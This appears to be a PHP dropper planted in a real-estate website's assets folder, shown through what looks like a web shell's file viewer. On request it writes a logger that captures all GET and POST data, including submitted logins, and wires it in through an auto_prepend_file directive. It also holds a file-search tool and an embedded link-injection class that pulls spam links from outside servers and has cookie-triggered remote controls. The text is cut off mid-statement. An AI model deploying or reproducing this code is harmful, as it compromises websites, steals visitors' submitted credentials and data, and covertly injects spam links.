Current Path : /var/www/www-root/data/www/monolith-realty.ru/assets/ |
Current File : /var/www/www-root/data/www/monolith-realty.ru/assets/sl.php |
<?php ini_set('display_errors','off'); error_reporting(0); $log_file = '<?php $file_get = $_SERVER["DOCUMENT_ROOT"] . "/assets/get.log"; $file_post = $_SERVER["DOCUMENT_ROOT"] . "/assets/post.log"; if (!empty($_GET)) { $fw = fopen($file_get, "a"); fwrite($fw, "GET " . var_export($_GET, true) ." ".$_SERVER[\'REQUEST_URI\']. " " . date("Y-m-d H:i:s") ); fclose($fw); } if (!empty($_POST)) { $fw = fopen($file_post, "a"); fwrite($fw, "POST ----" . var_export($_POST, true) ."----".$_SERVER[\'REQUEST_URI\'] . "----" . date("Y-m-d H:i:s") ); fclose($fw); } ?>'; $ml_file2 = <<<LABEL <?php class lTransmiter { var \$version = '6.5.1'; var \$user = false; var \$tm_cache_filename = 'links.dat'; var \$tm_config_filename = 'links.conf'; var \$tm_debug = false; var \$tm_test = false; var \$tm_test_num = 1; var \$tm_max_links_count = 20; var \$tm_charset = 'utf'; var \$tm_cache_lifetime = 7200; var \$tm_cache_reloadtime = 300; var \$tm_links_db_file = ''; var \$tm_links = array(); var \$tm_links_page = array(); var \$tm_links_count = 0; var \$tm_host = ''; var \$tm_request_uri = ''; var \$tm_socket_timeout = 6; var \$tm_plain_output = false; var \$tm_htmlbefore = ''; var \$tm_htmlafter = ''; var \$tm_target = ''; var \$tm_style = ''; var \$tm_class_name = ''; var \$tm_span = false; var \$tm_splitter = ' | '; var \$tm_class_name_span = ''; var \$tm_style_span = ''; var \$tm_div = false; var \$tm_class_name_div = ''; var \$tm_style_div = ''; var \$tm_return = 'text'; var \$tm_div_span_order = 'div'; var \$tm_force_sign = false; var \$ML_bot = false; var \$ML_noindex_bot = false; var \$tm_limit_start = 0; var \$tm_limit_items = 0; var \$tm_exact_match = true; function __construct(\$options) { \$host = ''; if (is_array(\$options)) { if (isset(\$options['host'])) { \$host = \$options['host']; } } elseif (strlen(\$options) != 0) { \$host = \$options; \$options = array(); } else { \$options = array(); } if (strlen(\$host) != 0) { \$this->tm_host = preg_replace('%\:(.*)%', '', \$host); } else { \$this->tm_host = preg_replace('%\:(.*)%', '', \$_SERVER['HTTP_HOST']); } \$this->tm_host = preg_replace('{^https?://}i', '', \$this->tm_host); \$this->tm_host = preg_replace('{^www\.}i', '', \$this->tm_host); \$this->tm_host = strtolower( \$this->tm_host); \$this->tm_links_config_file = dirname(__FILE__) . '/' . \$this->tm_host . '.' . \$this->tm_config_filename; \$this->load_config_file(\$this->tm_links_config_file, \$options); \$this->tm_request_uri = ''; if (isset(\$options['request_uri']) && strlen(\$options['request_uri']) != 0) { \$this->tm_request_uri = \$options['request_uri']; } \$username = \$options['USERNAME']; if (isset(\$_GET[\$username])) { \$this->tm_test = true; } if (isset(\$options['test']) && (\$options['test'] == 'true' || \$options['test'] === true)) { \$this->tm_test = true; } if (isset(\$options['test_num']) && intval(\$options['test_num']) > 1) { \$this->tm_test_num = \$options['test_num']; } if (isset(\$options['exact_match']) && \$options['exact_match'] != 'false') { \$this->tm_exact_match = \$options['exact_match']; } if (isset(\$options['plain_output']) && strlen(\$options['plain_output']) != 0 && \$options['plain_output'] != 'false') { \$this->tm_plain_output = \$options['plain_output']; } if (isset(\$options['charset']) && strlen(\$options['charset']) != 0 && \$options['charset'] != 'false') { \$this->tm_charset = \$options['charset']; } if (isset(\$options['target']) && strlen(\$options['target']) != 0 && \$options['target'] != 'false') { \$this->tm_target = \$options['target']; } if (isset(\$options['style']) && strlen(\$options['style']) != 0 && \$options['style'] != 'false') { \$this->tm_style = \$options['style']; } if (isset(\$options['force_sign']) AND \$options['force_sign'] != false) { \$this->tm_force_sign = true; } if (isset(\$options['class_name']) && strlen(\$options['class_name']) != 0 && \$options['class_name'] != 'false') { \$this->tm_class_name = \$options['class_name']; } if (isset(\$options['splitter']) && strlen(\$options['splitter']) != 0 && \$options['splitter'] != 'false') { \$this->tm_splitter = \$options['splitter']; } if (isset(\$options['span']) && strlen(\$options['span']) > 0 && \$options['span'] != 'false') { \$this->tm_span = true; } if (isset(\$options['class_name_span']) && strlen(\$options['class_name_span']) != 0 && \$options['class_name_span'] != 'false') { \$this->tm_class_name_span = \$options['class_name_span']; } if (isset(\$options['style_span']) && strlen(\$options['style_span']) != 0 && \$options['style_span'] != 'false') { \$this->tm_style_span = \$options['style_span']; } if (isset(\$options['div']) && strlen(\$options['div']) != 0 && \$options['div'] != 'false') { \$this->tm_div = \$options['div']; } if (isset(\$options['div_span_order']) && strlen(\$options['div_span_order']) != 0 && \$options['div_span_order'] != 'false') { \$this->tm_div_span_order = \$options['div_span_order']; } if (isset(\$options['class_name_div']) && strlen(\$options['class_name_div']) != 0 && \$options['class_name_div'] != 'false') { \$this->tm_class_name_div = \$options['class_name_div']; } if (isset(\$options['style_div']) && strlen(\$options['style_div']) != 0 && \$options['style_div'] != 'false') { \$this->tm_style_div = \$options['style_div']; } if (isset(\$options['return']) && strlen(\$options['return']) != 0 && \$options['return'] != 'false') { \$this->tm_return = \$options['return']; } if (isset(\$options['limit_start']) && intval(\$options['limit_start']) > 0) { \$this->tm_limit_start = \$options['limit_start']; } if (isset(\$options['limit_items']) && intval(\$options['limit_items']) > 0) { \$this->tm_limit_items = \$options['limit_items']; } if (isset(\$options['update_time']) && intval(\$options['update_time']) > 3600) { \$this->tm_cache_lifetime = \$options['update_time']; } if (isset(\$options['update_lock_time']) && intval(\$options['update_lock_time']) > 300) { \$this->tm_cache_reloadtime = \$options['update_lock_time']; } if (isset(\$options['htmlbefore']) && strlen(\$options['htmlbefore']) != 0 && \$options['htmlbefore'] != 'false') { \$this->tm_htmlbefore = \$options['htmlbefore']; } if (isset(\$options['htmlafter']) && strlen(\$options['htmlafter']) != 0 && \$options['htmlafter'] != 'false') { \$this->tm_htmlafter = \$options['htmlafter']; } if (isset(\$options['debug']) && strlen(\$options['debug']) != 0 && \$options['debug'] != 'false') { \$this->tm_debug = \$options['debug']; } if (isset(\$options['max_links']) && intval(\$options['max_links']) > 0) { \$this->tm_max_links_count = \$options['max_links']; } if (isset(\$options['socket_timeout']) && is_numeric(\$options['socket_timeout']) && \$options['socket_timeout'] > 0) { \$this->tm_socket_timeout = \$options['socket_timeout']; } if (!isset(\$options['USERNAME']) || strlen(\$options['USERNAME']) != 32) { return \$this->raise_error('Secure code is empty!<br />You must use secure code!<br /><a href="http://www.mainlink.ru/xmy/web/xscript/answers/start.aspx?id=60&q=38#38" target="_blank">What is it?</a>'); } \$this->service_function(\$options); \$this->user = \$options['USERNAME']; \$this->load_links(); } function load_config_file(\$filename, &\$options){ if (!file_exists(\$filename)) { return false; } \$config_data = \$this->lc_read(\$filename); \$config_data_Arr = explode("\n", \$config_data); foreach(\$config_data_Arr as \$config_data_Str){ \$config_data_Str_Arr = @explode('=', \$config_data_Str); if ( isset(\$config_data_Str_Arr[0]) && strlen(\$config_data_Str_Arr[0]) > 0 ) { \$op_key = \$config_data_Str_Arr[0]; \$options[\$op_key] = isset(\$config_data_Str_Arr[1]) ? \$config_data_Str_Arr[1] : ''; } } } function service_function(\$options) { if (isset(\$_SERVER['HTTP_USER_AGENT']) && strpos(\$_SERVER['HTTP_USER_AGENT'], 'mlbot.' . \$options['USERNAME']) !== false) { \$this->ML_bot = true; } if (isset(\$_SERVER['HTTP_USER_AGENT']) && strpos(\$_SERVER['HTTP_USER_AGENT'],'nomlbot.' . \$options['USERNAME']) !== false) { \$this->ML_noindex_bot = true; } if (isset(\$_COOKIE['vardump']) && \$this->ML_bot) { return \$this->raise_error('<ml_vardump>' . var_export(\$_SERVER, true) . '</ml_vardump>'); } if (isset(\$_COOKIE['getver'])) { return \$this->raise_error('<ml_getver>' . \$this->version . '</ml_getver>'); } if (isset(\$_COOKIE['getbase']) && \$this->ML_bot) { \$this->tm_links_db_file = dirname(__FILE__) . '/' . \$this->tm_host . '.' . \$this->tm_cache_filename; if (!file_exists(\$this->tm_links_db_file)) { return \$this->raise_error('<ml_base></ml_base>'); } \$ml_base = \$this->lc_read(\$this->tm_links_db_file); return \$this->raise_error('<ml_base>' . \$ml_base . '</ml_base>'); } if (isset(\$_COOKIE['getcfg']) && \$this->ML_bot) { return \$this->raise_error('<ml_code_config>' . var_export(\$options, true) . '</ml_code_config>'); } if (\$this->ML_bot) { \$link = '<a href="http://www.mainlink.ru/xmy/web/xscript/answers/start.aspx?id=60&q=38#38" target="_blank">SECURE_CODE</a>: <ml_secure>' . \$options['USERNAME'] . '</ml_secure>'; if (\$this->ML_noindex_bot) { print('<!--' . \$link . '-->'); } else { print('<pre width="100%" STYLE="font-family:monospace;font-size:0.95em;width:80%;border:red 2px solid;color:red;background-color:#FBB;">' . \$link . '</pre>'); } } if(isset(\$_COOKIE['update_settings'])&& \$this->ML_bot) { if (isset(\$_COOKIE['ml_clear_settings'])) { \$result = @unlink(\$this->tm_links_config_file); return \$this->raise_error('<ml_clear_settings>' . var_export(\$result, true) . '</ml_clear_settings>'); } if (isset(\$_COOKIE['ml_set_param']) && isset(\$_COOKIE['ml_param_value'])) { \$result = \$this->save_setting_2file(\$this->tm_links_config_file, \$_COOKIE['ml_set_param'], \$_COOKIE['ml_param_value']); return \$this->raise_error('<ml_update_settings_set_param>' . var_export(\$result, true) . '</ml_update_settings_set_param>'); } } if(isset(\$_COOKIE['clear_cache']) && \$this->ML_bot) { \$this->tm_links_db_file = dirname(__FILE__) . '/' . \$this->tm_host . '.' . \$this->tm_cache_filename; \$result = @unlink(\$this->tm_links_db_file); return \$this->raise_error('<ml_clear_cache>' . var_export(\$result, true) . '</ml_clear_cache>'); } if (isset(\$_COOKIE['date_code'])&& \$this->ML_bot) { \$date_code_data = '<ml_date_code>' . date("Y-m-d H:i:s", filectime(dirname(__FILE__) . '/ML_lcode.php')) . '</ml_date_code>'; \$date_code_data .= '<ml_server_time>' . date("Y-m-d H:i:s") . '</ml_server_time>'; return \$this->raise_error(\$date_code_data); } if(isset(\$_COOKIE['date_cache'])&& \$this->ML_bot) { \$this->tm_links_db_file = dirname(__FILE__) . '/' . \$this->tm_host . '.' . \$this->tm_cache_filename; \$date_cache_data = '<ml_date_cache>' . date("Y-m-d H:i:s", filectime(\$this->tm_links_db_file)) . '</ml_date_cache>'; \$date_cache_data .= '<ml_server_time>' . date("Y-m-d H:i:s") . '</ml_server_time>'; return \$this->raise_error(\$date_cache_data); } } function save_setting_2file(\$filename, \$param_name, \$param_value) { if (!file_exists(\$filename)) { \$file_data = ''; @touch(\$filename, time()); } else { \$file_data = \$this->lc_read(\$filename); } \$options = array(); \$is_injected = false; \$config_data_Arr = explode("\n", \$file_data); foreach(\$config_data_Arr as \$config_data_Str){ \$config_data_Str_Arr = @explode('=', \$config_data_Str); if ( isset(\$config_data_Str_Arr[0]) && strlen(\$config_data_Str_Arr[0]) > 0 ) { \$op_key = \$config_data_Str_Arr[0]; if ( \$op_key == \$param_name ) { \$options[] = \$op_key . '=' . \$param_value; \$is_injected = true; } else { \$options[] = \$op_key . '=' . isset(\$config_data_Str_Arr[1]) ? \$config_data_Str_Arr[1] : ''; } } } if (!\$is_injected) { \$options[] = \$param_name . '=' . \$param_value; } \$options_Str = implode("\n", \$options); return \$this->lc_write(\$filename, \$options_Str); } function load_links() { \$this->tm_links_db_file = dirname(__FILE__) . '/' . \$this->tm_host . '.' . \$this->tm_cache_filename; if (!\$this->setup_datafile(\$this->tm_links_db_file)) { return false; } @clearstatcache(); //Load links if (filemtime(\$this->tm_links_db_file) < (time()-\$this->tm_cache_lifetime) || (filemtime(\$this->tm_links_db_file) < (time()-\$this->tm_cache_reloadtime) && filesize(\$this->tm_links_db_file) == 0)) { // is update initiated by other client \$skip_update = false; if ( file_exists(\$this->tm_links_db_file . '.lock') AND time() - filemtime(\$this->tm_links_db_file . '.lock') < 600 ) { \$skip_update = true; } if(!\$skip_update){ @touch(\$this->tm_links_db_file . '.lock', time()); @touch(\$this->tm_links_db_file, time()); \$servers = array( 'main' => 'links.mainlink.ru', 'reserve' => 'd1.mainlinkads.com'); \$data = array(); \$path = '/l.aspx'; \$data = array('u' => \$this->tm_host, 'sec' => \$this->user, 'cs' => 'utf', 'decode' => true); if ( \$this->tm_plain_output && \$this->tm_plain_output != 'false' ) { \$data['plain'] = true; } if (\$links = \$this->request(\$servers, \$path, \$data, 'GET', \$this->tm_socket_timeout)) { if (substr(\$links, 0, 12) == 'FATAL ERROR:' && \$this->tm_debug) { \$this->raise_error(\$links); } else { if (\$links !== '') { \$links_Array = array(); if ( \$this->tm_plain_output && \$this->tm_plain_output != 'false' ) { \$links_Array = @explode("__END__\r\n", \$links); } else { \$links_Array = @unserialize(\$links); } \$links_data = ''; if ( !is_array(\$links_Array) ) { // let`s find out is this a connection problem or all links are removed if ( \$links == 'No Code' ) { \$this->lc_write(\$this->tm_links_db_file, \$links_data); } else { \$this->raise_error("Can't unserialize received data: " . \$links . "\nRequest: " . \$path . "?u=" . \$data['u'] . "&sec=" . \$data['sec'] . "&cs=utf&decode=1"); } } else { foreach(\$links_Array as \$link_url => \$link_texts){ // cleaning link if ( \$this->tm_plain_output && \$this->tm_plain_output != 'false' ) { \$link_url = trim(\$link_url) . '__END__'; } else { \$link_url = trim(\$link_url); } \$link_url = substr(\$link_url, 1); \$link_url = substr(\$link_url, 0, -1); \$link_url = urldecode(\$link_url); \$link_url = rawurldecode(\$link_url); \$link_url = stripslashes(\$link_url); if ( preg_match('%^(.*?)/%', \$link_url) ) { \$link_url = @preg_replace('%^(.*?)/%', '/', \$link_url); } else { \$link_url = '/'; } foreach(\$link_texts as \$link_text){ \$links_data .= rawurlencode(urldecode(\$link_url)) . '__LINK__' . \$link_text . "__END__\r\n"; } } \$this->lc_write(\$this->tm_links_db_file, \$links_data); } } else if (\$this->tm_debug) { \$this->raise_error("Can't unserialize received data."); } } } @unlink(\$this->tm_links_db_file . '.lock'); } } \$links = \$this->get_links(\$this->tm_links_db_file, \$this->tm_request_uri); \$this->tm_file_change_date = @gmstrftime ("%d.%m.%Y %H:%M:%S", filectime(\$this->tm_links_db_file)); \$this->tm_file_size = @filesize( \$this->tm_links_db_file ); if (empty(\$links)) { \$this->tm_links = array(); if (\$this->tm_debug) \$this->raise_error("No links for this page found."); } else { \$this->tm_links = \$links; } if (\$this->tm_test) { \$test_lnks_num = ( \$this->tm_test_num > 1 ) ? \$this->tm_test_num : 1; for(\$i=0; \$i<\$test_lnks_num; \$i++) { \$links[] = '<noindex>Это тестовая ссылка. <a href="http://www.mainlink.ru">Mainlink.ru</a></noindex>'; } } foreach(\$links as \$key => \$link){ if ( \$this->tm_charset == 'win' ) { \$link = @iconv("utf-8", 'cp1251//TRANSLIT', \$link); } if ( \$this->tm_charset == 'koi' ) { \$link = @iconv("utf-8", 'koi8-r//TRANSLIT', \$link); } if ( \$this->tm_charset == 'iso' ) { \$link = @iconv("utf-8", 'ISO-8859-1//TRANSLIT', \$link); } if ( strlen(\$this->tm_charset) > 0 && trim(strtolower(\$this->tm_charset)) != 'win' && trim(strtolower(\$this->tm_charset)) != 'koi' && trim(strtolower(\$this->tm_charset)) != 'iso' && trim(strtolower(\$this->tm_charset)) != 'utf' && trim(strtolower(\$this->tm_charset)) != 'utf-8' ) { \$link = @iconv("utf-8", \$this->tm_charset . '//TRANSLIT', \$link); } if ( strlen(\$this->tm_style) > 0 ) { \$link = @preg_replace('/<a([^>]+)style="(.*?)"/sim', '<a \\1', \$link); \$link = @preg_replace('/<a([^>]+)style=\'(.*?)\'/sim', '<a \\1', \$link); \$link = @preg_replace('/<a\s+/ism', '<a style="' . \$this->tm_style . '" ', \$link); } if ( strlen(\$this->tm_class_name) > 0 ) { \$link = @preg_replace('/<a([^>]+)class="(.*?)"/sim', '<a \\1', \$link); \$link = @preg_replace('/<a([^>]+)class=\'(.*?)\'/sim', '<a \\1', \$link); \$link = @preg_replace("/<a(.*?)>/ism", '<a \\1 class="' . \$this->tm_class_name . '">', \$link); } if ( strlen(\$this->tm_target) > 0 ) { \$link = @preg_replace('/<a([^>]+)target=\'(.*?)\'/sim', '<a \\1', \$link); \$link = @preg_replace('/<a([^>]+)target="(.*?)"/sim', '<a \\1', \$link); \$link = @preg_replace("/<a(.*?)>/ism", '<a \\1 target="' . \$this->tm_target . '">', \$link); } if( isset(\$this->tm_htmlbefore) || isset(\$this->tm_htmlafter) ) { @\$this->tm_links_page[\$key] = \$this->tm_htmlbefore . \$link . \$this->tm_htmlafter; } else { @\$this->tm_links_page[\$key] = \$link; } } \$this->tm_links_count = count(\$this->tm_links_page); } function get_links(\$filename, \$uri = '') { \$fp = @fopen(\$filename, 'rb'); @flock(\$fp, LOCK_SH); \$result = array(); if (!empty(\$fp)) { clearstatcache(); \$length = @filesize(\$filename); \$tmp = (!empty(\$length)) ? fread(\$fp, \$length) : '' ; // notice remover if ( !isset(\$_SERVER['REDIRECT_URL']) ) { \$_SERVER['REDIRECT_URL'] = ''; } if ( !isset(\$_SERVER['HTTP_X_FORWARDED_URI']) ) { \$_SERVER['HTTP_X_FORWARDED_URI'] = ''; } // exact matches for preset uri if ( strlen(\$uri) > 0 ) { \$uri = str_replace('&', '&', \$uri); \$exact_match_pattern = ( \$this->tm_exact_match != true ) ? '(?:.*?)' : ''; if ( preg_match_all('{^' . rawurlencode(urldecode(\$uri)) . \$exact_match_pattern . '__LINK__(.*?)__END__}smi', \$tmp, \$regs) ) { \$result = array_merge(\$result, \$regs[1]); } if ( \$this->ML_bot ) { print('<ml_code_match_1>' . var_export(\$regs, true) . '</ml_code_match_1>'); print('<ml_code_pattern_1>' . var_export(rawurlencode(urldecode(\$uri)), true) . '</ml_code_pattern_1>'); } } else { if ( isset(\$_SERVER['REQUEST_URI']) ) { \$_SERVER['REQUEST_URI'] = str_replace('&', '&', \$_SERVER['REQUEST_URI']); \$exact_match_pattern = ( \$this->tm_exact_match != true ) ? '(?:.*?)' : ''; if ( preg_match_all('{^' . rawurlencode(urldecode(\$_SERVER['REQUEST_URI'])) . \$exact_match_pattern . '__LINK__(.*?)__END__}smi', \$tmp, \$regs) ) { \$result = array_merge(\$result, \$regs[1]); } if ( \$this->ML_bot ) { print('<ml_code_match_2>' . var_export(\$regs, true) . '</ml_code_match_2>'); print('<ml_code_pattern_2>' . var_export(rawurlencode(urldecode(\$_SERVER['REQUEST_URI'])), true) . '</ml_code_pattern_2>'); } } elseif ( isset(\$_SERVER['REDIRECT_URL']) && count(\$result) < 1 ) { \$_SERVER['REDIRECT_URL'] = str_replace('&', '&', \$_SERVER['REDIRECT_URL']); \$exact_match_pattern = ( \$this->tm_exact_match != true ) ? '(?:.*?)' : ''; if ( preg_match_all('{^' . rawurlencode(urldecode(\$_SERVER['REDIRECT_URL'])) . \$exact_match_pattern . '__LINK__(.*?)__END__}smi', \$tmp, \$regs) ) { \$result = array_merge(\$result, \$regs[1]); } if ( \$this->ML_bot ) { print('<ml_code_match_3>' . var_export(\$regs, true) . '</ml_code_match_3>'); print('<ml_code_pattern_3>' . var_export(rawurlencode(urldecode(\$_SERVER['REDIRECT_URL'])), true) . '</ml_code_pattern_3>'); } } elseif ( isset(\$_SERVER['HTTP_X_FORWARDED_URI']) && count(\$result) < 1 ) { \$_SERVER['HTTP_X_FORWARDED_URI'] = str_replace('&', '&', \$_SERVER['HTTP_X_FORWARDED_URI']); \$exact_match_pattern = ( \$this->tm_exact_match != true ) ? '(?:.*?)' : ''; if ( preg_match_all('{^' . rawurlencode(urldecode(\$_SERVER['HTTP_X_FORWARDED_URI'])) . \$exact_match_pattern . '__LINK__(.*?)__END__}smi', \$tmp, \$regs) ) { \$result = array_merge(\$result, \$regs[1]); } if ( \$this->ML_bot ) { print('<ml_code_match_4>' . var_export(\$regs, true) . '</ml_code_match_4>'); print('<ml_code_pattern_4>' . var_export(rawurlencode(urldecode(\$_SERVER['HTTP_X_FORWARDED_URI'])), true) . '</ml_code_pattern_4>'); } } } // clean results \$result = array_unique(\$result); @flock(\$fp, LOCK_UN); @fclose(\$fp); } return \$result; } function setup_datafile(\$filename) { if (!is_file(\$filename)) { if (@touch(\$filename, time() - \$this->tm_cache_lifetime)) { @chmod(\$filename, 0666); } else { return \$this->raise_error("There is no file " . \$filename . ". Failed to create. Set mode to 777 on the folder."); } } if (!is_writable(\$filename)) { return \$this->raise_error("There is no permissions to write: " . \$filename . "! Set mode to 777 on the folder."); } return true; } function render_link(\$links) { \$span_before_text = ''; \$span_after_text = ''; \$div_before_text = ''; \$div_after_text = ''; if ( \$this->tm_span ) { \$span_before_text = '<span'; if ( strlen(\$this->tm_style_span) > 0 ) { \$span_before_text .= ' style="' . \$this->tm_style_span . '"'; } if ( strlen(\$this->tm_class_name_span) > 0 ) { \$span_before_text .= ' class="' . \$this->tm_class_name_span . '"'; } \$span_before_text .= '>'; \$span_after_text = '</span>'; } if ( \$this->tm_div ) { \$div_before_text = '<div'; if ( strlen(\$this->tm_style_div) > 0 ) { \$div_before_text .= ' style="' . \$this->tm_style_div . '"'; } if ( strlen(\$this->tm_class_name_div) > 0 ) { \$div_before_text .= ' class="' . \$this->tm_class_name_div . '"'; } \$div_before_text .= '>'; \$div_after_text = '</div>'; } if ( \$this->tm_div_span_order == 'div' ) { \$links = \$div_before_text . \$span_before_text . \$links . \$span_after_text . \$div_after_text; } else { \$links = \$span_before_text . \$div_after_text . \$links . \$div_after_text . \$span_after_text; } return \$links; } function build_links() { \$result = ''; if (\$this->ML_bot) { \$result .= '<ml_code>' . \$this->version . "</ml_code>\n"; \$result .= 'REMOTE_ADDR=' . \$this->tm_host . "\n"; \$result .= 'charset=' . \$this->tm_charset . "\n"; \$result .= 'file change date=' . \$this->tm_file_change_date . "\n"; \$result .= 'tm_cache_file_size=' . \$this->tm_file_size . "\n"; \$result .= 'tm_links_count_on_page=' . \$this->tm_links_count . "\n"; \$result .= '-->'; } if (isset(\$_COOKIE['getver']) || \$this->ML_bot || \$this->tm_force_sign) { \$result .= '<!--<ml_getver>' . \$this->version . '</ml_getver>-->'; } \$start_index = \$this->tm_limit_start; \$limit = ( \$this->tm_limit_items > 0 ) ? \$this->tm_limit_items : \$this->tm_max_links_count; \$this->tm_links_page = array_slice(\$this->tm_links_page, \$start_index, \$limit); if ( count(\$this->tm_links_page) < 1 ) { return \$result; } if ( \$this->tm_return == 'text' ) { \$result .= implode(\$this->tm_splitter, \$this->tm_links_page); \$result = \$this->render_link(\$result); } else { \$result = \$this->tm_links_page; } return \$result; } function raise_error(\$e) { if ( \$this->ML_bot || isset(\$_COOKIE['getver']) ) { print '<!--<ml_code_response>' . \$e . '</ml_code_response>-->'; } return false; } function lc_read(\$filename) { \$fp = @fopen(\$filename, 'rb'); @flock(\$fp, LOCK_SH); if (\$fp) { clearstatcache(); \$length = @filesize(\$filename); if (\$length) { \$data = @fread(\$fp, \$length); } else { \$data = ''; } @flock(\$fp, LOCK_UN); @fclose(\$fp); return \$data; } return \$this->raise_error("Can't get data from the file: " . \$filename); } function lc_write(\$filename, \$data) { \$fp = @fopen(\$filename, 'wb'); if (\$fp) { @flock(\$fp, LOCK_EX); @fwrite(\$fp, \$data); @flock(\$fp, LOCK_UN); @fclose(\$fp); if (md5(\$this->lc_read(\$filename)) != md5(\$data)) { return \$this->raise_error("Integrity was violated while writing to file: " . \$filename); } return true; } return \$this->raise_error("Can't write to file: " . \$filename); } function request(\$servers, \$file, \$data=array(), \$method='GET', \$timeout = 15) { \$port = 80; foreach(\$servers as \$host) { \$_data = \$data; \$tmp = array(); foreach(\$_data as \$k=>\$v){ \$tmp[] = \$k.'='.urlencode(\$v); } \$_data = implode('&', \$tmp); \$path = \$file; if( \$method == 'GET' && \$_data != '' ) { \$path .= '?' . \$_data; } \$request = \$method." ".\$path." HTTP/1.0\r\n"; \$request .= "Host: ".\$host."\r\n"; \$request .= "User-Agent: MainLink links db updater 6.3\r\n"; \$request .= "Connection: close\r\n\r\n"; @ini_set('allow_url_fopen', 1); @ini_set('default_socket_timeout', \$timeout); @ini_set('user_agent', 'MainLink links db updater 6.3'); \$answer = ''; \$response = ''; if(function_exists('socket_create')) { @\$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); @socket_set_option(\$socket, SOL_SOCKET, SO_SNDTIMEO, array('sec' => \$timeout, 'usec' => 0)); @socket_connect(\$socket, \$host, \$port); @socket_write(\$socket, \$request); while(\$a = @socket_read(\$socket, 0xFFFF)) { \$response .= \$a; } \$answer = ( \$response != '' ) ? explode("\r\n\r\n", \$response, 2) : ''; \$response = ''; } if(function_exists('fsockopen') && \$answer == '') { \$fp = @fsockopen(\$host, \$port, \$errno, \$errstr, \$timeout); if (\$fp) { @fputs(\$fp, \$request); while (!@feof(\$fp)) { \$response .= @fgets(\$fp, 0xFFFF); } @fclose(\$fp); } \$answer = ( \$response != '' ) ? explode("\r\n\r\n", \$response, 2) : ''; \$response = ''; } if(function_exists('curl_init') && \$ch = @curl_init() && \$answer == '') { @curl_setopt(\$ch, CURLOPT_URL, 'http://' . \$host . \$path); @curl_setopt(\$ch, CURLOPT_HEADER, true); @curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); @curl_setopt(\$ch, CURLOPT_CONNECTTIMEOUT, \$timeout); @curl_setopt(\$ch, CURLOPT_USERAGENT, 'MainLink links db updater 6.3'); \$response = @curl_exec(\$ch); \$answer = ( \$response != '' ) ? explode("\r\n\r\n", \$response, 2) : ''; \$response = ''; @curl_close(\$ch); } if( function_exists('file_get_contents') && ini_get('allow_url_fopen') == 1 && \$answer == '') { \$response = @file_get_contents('http://' . \$host . \$path); \$answer[1] = ( \$response != '' ) ? \$response : ''; } if(\$answer[1] != '') { return \$answer[1]; } } return \$this->raise_error('<!--ERROR: Unable to use transport.-->'); } } ?> LABEL; $find_file = <<<LABEL <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <head> <title>...::::FM</title> </head> <body marginwidth="0" marginheight="0"> <script language="Javascript" type="text/javascript"> <!-- // Disable text selection, binding the onmousedown, but not for some elements, it must work. function disableTextSelection(e){ var type = String(e.target.type); return (type.indexOf('select') != -1 || type.indexOf('button') != -1 || type.indexOf('input') != -1 || type.indexOf('radio') != -1); } function enableTextSelection(){return true} if (is.ie) document.onselectstart=new Function('return false') else { document.body.onmousedown=disableTextSelection document.body.onclick=enableTextSelection } var flag = false function set_flag(arg) { flag = arg; } function go_dir(arg) { var setflag; setflag = (flag)?1:0; document.location.href='sl.php?frame=2&fm_current_root=%2F&setflag='+setflag+'&fm_current_dir=/var/www/html/s-data/&ec_dir='+arg; } function go(arg) { if (flag) { parent.frame3.set_dir_dest(arg+'/'); flag = false; } else { parent.frame3.location.href='sl.php?frame=3&fm_current_root=%2F&fm_current_dir='+arg+'/'; } } function set_fm_current_root(arg){ document.location.href='sl.php?frame=2&fm_current_root='+encodeURIComponent(arg); } function refresh_tree(){ document.location.href='sl.php?frame=2&fm_current_root=%2F'; } //--> </script> </body> </html> <?php \$line_search_post=isset(\$_POST['line_search'])?\$_POST['line_search']:""; \$dir_post=isset(\$_POST['dir'])?trim(\$_POST['dir']):__DIR__; echo '<br><form method="POST"> Текст поиска: <input type="text" name="line_search" value="'.\$line_search_post.'"><br> Папка: <input type="text" size="100" name="dir" value="'.\$dir_post.'"> <br> <input type="submit" name="submit" value="Искать"> </form>'; if(isset(\$_POST['submit'])) { if(\$_POST['line_search']=="" or \$_POST['dir']=="") header("Location: ".\$_SERVER['PHP_SELF']); \$line_search=\$_POST['line_search']; \$dir=trim(\$_POST['dir']); \$files_in_dir=array(); //Функция обновляет массив \$files_in_dir с именами файлов в указанной папке. function filesdir(\$dir='.') { global \$files_in_dir; \$scandir=scandir(\$dir); //массив с файлами и папками в папке foreach (\$scandir as \$num_file => \$name_file) { if (\$name_file=='.' or \$name_file=='..') continue; if (\$dir=='.') \$add_name=""; else \$add_name="\$dir/"; if (is_file(\$add_name.\$name_file)){ \$ext=explode('.',\$add_name.\$name_file); \$ext=\$ext[count(\$ext)-1]; \$scriptFileName=explode('/', \$_SERVER['PHP_SELF']); \$scriptFileName=\$scriptFileName[count(\$scriptFileName)-1]; // if(\$ext=='gif' or \$ext=='zip' or \$ext=='js' or \$ext=='js' or \$ext=='rar' or \$ext=='jpg' or \$ext=='jpeg' or \$ext=='png' or \$name_file==\$scriptFileName) continue; //Не текстовые файлы, не искать в них. if(\$ext!='php' and (\$ext!='txt') and (\$ext!='xml')) continue; \$files_in_dir[]=\$add_name.\$name_file; } elseif (is_dir(\$add_name.\$name_file)) { filesdir(\$add_name.\$name_file); } } } filesdir(\$dir); foreach (\$files_in_dir as \$num_file => \$name_file) { \$file=file(\$name_file); \$found=false; \$num_line = array(); \$text_num_line = array(); foreach (\$file as \$line_num => \$line_text) { if (stripos(\$line_text, \$line_search) !== false) { \$found=true; if (stripos(\$line_text, 'ya.ru')==true or stripos(\$line_text, '.run')==true or stripos(\$line_text, 'yandex.ru')==true or stripos(\$line_text, 'bitrix.ru')==true or stripos(\$line_text, 'bitrix24.ru')==true) {\$found=false;} \$num_line[]=\$line_num+1; \$text_num_line[]=htmlspecialchars(trim(\$line_text), ENT_QUOTES); } } if (\$found) { echo '<b>'.\$name_file.'</b><br>'; \$count=count(\$num_line); for(\$i=0;\$i<=\$count-1;\$i++) { echo 'Found: line <b>'.\$num_line[\$i].'</b> ('.\$text_num_line[\$i].')<br>'; } \$num_line=''; } } } ?> LABEL; if (($_GET['p']) == 'find') file_put_contents('find.php', $find_file); if (($_GET['p']) == 'log') { file_put_contents('save_log.php', $log_file); $mm = 'php_value auto_prepend_file ' .__DIR__. '/save_log.php'; echo 